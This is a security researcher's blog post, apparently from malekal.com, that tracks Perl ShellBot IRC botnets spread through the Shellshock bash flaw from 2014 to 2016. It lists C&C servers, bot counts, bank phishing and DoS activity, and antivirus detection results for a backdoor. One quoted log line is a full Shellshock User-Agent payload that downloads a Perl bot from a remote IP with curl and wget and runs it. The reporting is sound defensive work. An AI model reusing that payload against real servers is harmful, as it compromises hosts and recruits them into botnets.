Perl.Shellbot by Shellshock Bash Attack

My first Script kiddie by Shellshock Bash Attack yesterday 🙂

Perl_ShellBot2leading to PHP.ShellBot – server 185.31.209.84

inetnum:        185.31.208.0 – 185.31.209.255
netname:        SIM-NETWORKS
descr:          SIM-Networks Professional Hosting Solutions
country:        DE
admin-c:        SD9104-RIPE
tech-c:         SD9104-RIPE
status:         ASSIGNED PA
mnt-by:         SIMNETWORKS-MNT
source:         RIPE # Filtered
mnt-routes:     SIMNETWORKS-MNT
mnt-domains:    SIMNETWORKS-MNT

Perl_ShellBot6 ~713 clients – if bots this is not bad 🙂

Perl_ShellBot

interrestings bots :

Perl_ShellBot3They seems to be Romanian

Perl_ShellBot Perl_ShellBot7

The abuse made a move :

Perl_ShellBot4
and the IRCd has been down

Perl_ShellBot5
need to rebuild everything.

EDIT – 2014 September 28

Another spotted yesterday :

94.102.63.238
~3000 bots :
94.102.63.238_ircd2 94.102.63.238_ircd

Today, the channel is retricted, they reach 3900 bots.
I think, they stop to populate this server.

94.102.63.238_ircd3EDIT – September 30 : zoom on two botnets activities

Group 213.5.67.223

PerlShellBot_Phishing
Install a Shell to sell it :

PerlShellBot_Phishing4

PerlShellBot_Phishing5

but the main activity is Phishing email :

PerlShellBot_Phishing3The script give Spam capability :
PerlShellBot_Phishing6
sdfsdf
PerlShellBot_Phishing9

Some Phishing Example – seems to be Bank Phishing :PerlShellBot_Phishing8

PerlShellBot_Phishing7

a DoS group

Another group from dl.directxex.net/dl/nice.png also spreding by shellshock bash vulnerability

PerlShellBot_DoS_init
that made download other script from ftp://37.59.68.12/pub/ :

PerlShellBot_DoS_init2
PerlShellBot_DoS4connect to 37.59.68.5
PerlShellBot_DoS2This group made DoS Attack.

PerlShellBot_DoS3

PerlShellBot_DoS5

EDIT -2015 February 4

Still Around and same actor.

Two Attempts :

http://www.malekal.com/modsec/index.php?ip=209.236.133.201
http://www.malekal.com/modsec/index.php?ip=64.187.99.130

Two differents scripts but both connect to 46.4.83.92

inetnum: 46.4.83.64 – 46.4.83.95
netname: HETZNER-RZ14
descr: Hetzner Online AG
descr: Datacenter 14
country: DE
admin-c: HOAC1-RIPE
tech-c: HOAC1-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
mnt-lower: HOS-GUN
mnt-routes: HOS-GUN
source: RIPE # Filtered

Shellshock_IRC_script2 Shellshock_IRC_script

 

Around 700 bots on this server.

Shellshock_IRC Shellshock_IRC_channels2 Shellshock_IRC_channels

 

EDIT – 2015 December

Still around :

http://www.malekal.com/modsec/index.php?ip=69.12.70.34
http://www.malekal.com/modsec/index.php?ip=67.205.111.9

User-Agent: () { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://188.138.69.229/gnu;curl -O http://188.138.69.229/gnu;wget http://188.138.69.229/gnu;perl /tmp/gnu*;perl gnu;rm -rf /tmp/gnu*"
X-Forwarded-For: 67.205.111.9

The IRCD C&C is at 46.4.132.212
JB_Backdoor_Perl
JB_Backdoor_Perl_2

He is doing Phishing campaign agaist a spanish bank « laCaixa »

JB_Backdoor_Perl_phishing

 

JB_Backdoor_Perl_phishing_2

 

JB_Backdoor_Perl_phishing_3

EDIT – January 2016

Still around, at iweb/privatedns, but no reply from the abuse.
https://twitter.com/malekal_morte/status/673105128757575680
https://twitter.com/malekal_morte/status/565176780869599233

JB_23.95.6.90

Still Phishing :

JB_spam

EDIT : JB is using a backdoor to get another control of bots if IRCd take down.
Dr.WEB does not detected this one, so Plesk are not protected, i will try to make them adding it: https://twitter.com/malekal_morte/status/690597750614953984
I have already sent this backdoor some weeks ago, detection is now 12/54 on VirusTotal.

SHA256:e0b86ff4e89e1a24ae894c71b9d6e30fa1097676c8ef46cede50ab40e34d16d4
Nom du fichier :b.pl
Ratio de détection :12 / 54
Date d’analyse :2016-01-25 08:42:51 UTC (il y a 2 minutes)
AntivirusRésultatMise à jour
AgnitumPerl.Shellbot.T20160124
AvastPHP:Agent-AO [Trj]20160125
ClamAVTrojan.Perlscript20160125
ESET-NOD32Perl/Small.L20160125
GDataScript.Trojan.Agent.V6OX3T20160125
IkarusTrojan.Perl.Small20160125
McAfeePerl/Generic Backdoor.a20160125
McAfee-GW-EditionPerl/Generic Backdoor.a20160125
MicrosoftBackdoor:Perl/Small.B20160125
NANO-AntivirusTrojan.Script.Agent.bowhye20160125
Qihoo-360Script/Trojan.25f20160125
SophosTroj/CBShell-A20160125

JB_backdoor
got some IRCd take down, now full in Russia

62.109.19.113 62.109.19.114

and make losing around ~200 bots – seems now it’s hard to him to reach 500 bots.

JB_botnet_500_bots

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 128 times, 1 visits today)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *